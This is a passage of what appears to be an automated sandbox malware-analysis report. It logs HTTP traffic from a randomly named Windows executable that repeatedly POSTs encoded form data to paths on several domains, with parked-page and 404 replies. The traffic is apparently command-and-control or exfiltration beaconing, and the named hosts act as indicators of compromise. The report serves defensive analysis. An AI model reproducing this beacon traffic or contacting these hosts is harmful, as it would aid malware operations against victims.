                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Nov 21, 2024 16:57:33.850075960 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg4NWJjYzItYmVhMi00OTI5LTg1ZWYtYTBkMDM4Y2E2ODRjIiwicGFnZV90aW1lIjoxNzMyMjA0Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449749199.59.243.227803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:35.399979115 CET642OUTPOST /w9z4/ HTTP/1.1
                                                                                                                    Host: www.acond-22-mvr.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.acond-22-mvr.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 35 44 6e 52 48 74 51 46 56 64 65 2f 72 46 4c 53 55 7a 4c 73 62 4a 33 46 6a 38 52 79 74 47 49 54 56 38 38 54 31 46 41 4c 55 61 65 4d 6d 6e 4b 51 61 63 4d 75 5a 51 50 52 4e 77 59 54 4c 69 42 77 4e 36 76 46 66 39 61 46 41 66 49 2b 34 4e 2f 35 66 51 68 37 34 41 54 45 35 49 36 70 6e 55 68 75 4c 53 30 6c 69 2b 73 59 7a 74 54 39 41 49 43 76 37 39 77 43 66 34 52 47 49 4c 42 75 54 48 6f 32 41 33 66 55 54 45 76 68 63 45 77 63 47 4c 76 78 39 72 49 78 6d 6c 65 7a 4d 6c 34 32 4b 33 46 63 6b 66 6f 78 76 61 4c 39 6b 63 46 58 77 3d
                                                                                                                    Data Ascii: GzeXFT7=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcGLvx9rIxmlezMl42K3FckfoxvaL9kcFXw=
                                                                                                                    Nov 21, 2024 16:57:36.527600050 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Thu, 21 Nov 2024 15:57:36 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1138
                                                                                                                    x-request-id: c6f91381-d40a-4a67-8e1f-ce78ba05e30e
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                    set-cookie: parking_session=c6f91381-d40a-4a67-8e1f-ce78ba05e30e; expires=Thu, 21 Nov 2024 16:12:36 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Nov 21, 2024 16:57:36.527705908 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZmOTEzODEtZDQwYS00YTY3LThlMWYtY2U3OGJhMDVlMzBlIiwicGFnZV90aW1lIjoxNzMyMjA0Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449760199.59.243.227803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:38.067816973 CET10724OUTPOST /w9z4/ HTTP/1.1
                                                                                                                    Host: www.acond-22-mvr.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.acond-22-mvr.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 30 63 33 53 42 36 75 30 41 68 61 76 76 57 44 34 77 38 55 47 6d 61 69 52 51 77 33 35 44 4c 6a 58 64 41 4b 7a 6d 4f 6d 62 50 45 4c 66 33 30 49 4b 34 36 4a 42 6d 62 54 51 6e 48 52 7a 4a 45 2f 72 39 59 34 51 50 6b 39 65 70 36 72 58 6f 6a 65 30 7a 68 4a 51 37 56 2f 6d 42 49 54 65 2f 37 7a 72 54 65 45 75 35 34 62 6a 65 4d 42 53 6a 44 59 44 61 6f 32 6a 43 7a 55 39 47 4c 34 46 47 48 7a 65 7a 6a 58 59 45 68 59 66 31 6a 55 53 43 51 51 35 36 39 65 6b 77 69 4d 79 7a 37 58 6a 55 34 56 6d 44 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o0c3SB6u0AhavvWD4w8UGmaiRQw35DLjXdAKzmOmbPELf30IK46JBmbTQnHRzJE/r9Y4QPk9ep6rXoje0zhJQ7V/mBITe/7zrTeEu54bjeMBSjDYDao2jCzU9GL4FGHzezjXYEhYf1jUSCQQ569ekwiMyz7XjU4VmDWRt2O9sQRSA4J0tXRefsQlFBfmdzETpoYvEHLZERJ3SlyoUnPkPZIOR8/MJeLLujFnF24nodn/8fNengkAFbzUHkUiivFZpR1f8E95ksTcpsi0Vps/TloLoiIRyvKUgJFkVnmszIPkhT+RHAlXX2h04Sq0nemJzTC8sYZxyIRyssvXrEgQ8FOm7iADR1ZSxV2cNk8K4PE5+iUotf9L0tuK4gMtlVTsw3lJ0zvBfJnFcb8/kfuqPt4Yks2EibA+vp27dNQ1UnmpnZjVeK7tNkTk+ocpC3O1hAsxckovcc6+El9LMHft9rIDhRFA0mslVgMusPwli2L5MUUE28eKWOj6KwEFk3H1gnaN8ms0DV51S+2nE0+TOqJE3UNNAs03sFEmPoh/SJr8Qtth1GXz1nKyZDndXNCb2r94SNj25CdNkcqr0159O5qf4RXiGvp7Sx2yE3k2YOOgBXAqtqKof3Z9oX0ITjw73+3myCckt6jJi6l6QUi7X+CPW1fwq6b8Dcrl+0awvo3qv31q+WYqp6RfYv2HVfKUyQk9zDZy9XWkq4ox/odOkUVGMR23sdkZk6l8reBac0WHae+52dUcV6057HB69x+HNqQJh4I1NNvP3bqFA11vQDwHSnxnHqLQKy4cQiVrrXD84bW6BFufWg1rr89lYC+EdXSs [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:57:39.250854015 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Thu, 21 Nov 2024 15:57:38 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1138
                                                                                                                    x-request-id: 7d630e81-77c0-481e-888b-d4e9ce7f7c69
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                    set-cookie: parking_session=7d630e81-77c0-481e-888b-d4e9ce7f7c69; expires=Thu, 21 Nov 2024 16:12:39 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Nov 21, 2024 16:57:39.251050949 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Q2MzBlODEtNzdjMC00ODFlLTg4OGItZDRlOWNlN2Y3YzY5IiwicGFnZV90aW1lIjoxNzMyMjA0Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449766199.59.243.227803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:40.718899965 CET352OUTGET /w9z4/?GzeXFT7=68uIQ7XuXrYyzH3jGwxTrPeynRmH3PyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfdceGGDC9QtpScRVRYhm/IS5VlT3jRiR+euo=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.acond-22-mvr.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:57:41.897972107 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Thu, 21 Nov 2024 15:57:41 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1486
                                                                                                                    x-request-id: 4620f40b-ddce-4879-bace-f742cdedbc35
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EbpqWhqOYiXb3mX57HN8lOtFAiCYBobIpjvW7yMyuXXLip/nt1+PfhiPHvHfHWxHSpYfc10030SBS40vvS50Ww==
                                                                                                                    set-cookie: parking_session=4620f40b-ddce-4879-bace-f742cdedbc35; expires=Thu, 21 Nov 2024 16:12:41 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 62 70 71 57 68 71 4f 59 69 58 62 33 6d 58 35 37 48 4e 38 6c 4f 74 46 41 69 43 59 42 6f 62 49 70 6a 76 57 37 79 4d 79 75 58 58 4c 69 70 2f 6e 74 31 2b 50 66 68 69 50 48 76 48 66 48 57 78 48 53 70 59 66 63 31 30 30 33 30 53 42 53 34 30 76 76 53 35 30 57 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EbpqWhqOYiXb3mX57HN8lOtFAiCYBobIpjvW7yMyuXXLip/nt1+PfhiPHvHfHWxHSpYfc10030SBS40vvS50Ww==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Nov 21, 2024 16:57:41.898050070 CET939INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDYyMGY0MGItZGRjZS00ODc5LWJhY2UtZjc0MmNkZWRiYzM1IiwicGFnZV90aW1lIjoxNzMyMjA0Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449782146.88.233.115803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:47.191518068 CET619OUTPOST /11t3/ HTTP/1.1
                                                                                                                    Host: www.smartcongress.net
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.smartcongress.net
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.smartcongress.net/11t3/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2f 4a 4e 5a 73 31 66 6e 53 51 6f 39 71 66 37 32 42 31 2f 35 48 58 57 31 35 2f 4c 36 64 70 73 43 53 51 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/JNZs1fnSQo9qf72B1/5HXW15/L6dpsCSQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449788146.88.233.115803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:50.186734915 CET639OUTPOST /11t3/ HTTP/1.1
                                                                                                                    Host: www.smartcongress.net
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.smartcongress.net
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.smartcongress.net/11t3/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 79 47 6b 34 43 4f 51 71 52 4c 4a 59 5a 69 72 42 68 68 65 79 58 79 64 2b 50 79 48 70 55 64 4d 62 59 3d
                                                                                                                    Data Ascii: GzeXFT7=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVXyGk4COQqRLJYZirBhheyXyd+PyHpUdMbY=
                                                                                                                    Nov 21, 2024 16:57:51.495995045 CET380INHTTP/1.1 404 Not Found
                                                                                                                    content-type: text/html; charset=iso-8859-1
                                                                                                                    content-length: 196
                                                                                                                    date: Thu, 21 Nov 2024 15:57:51 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    x-tuned-by: N0C
                                                                                                                    connection: close
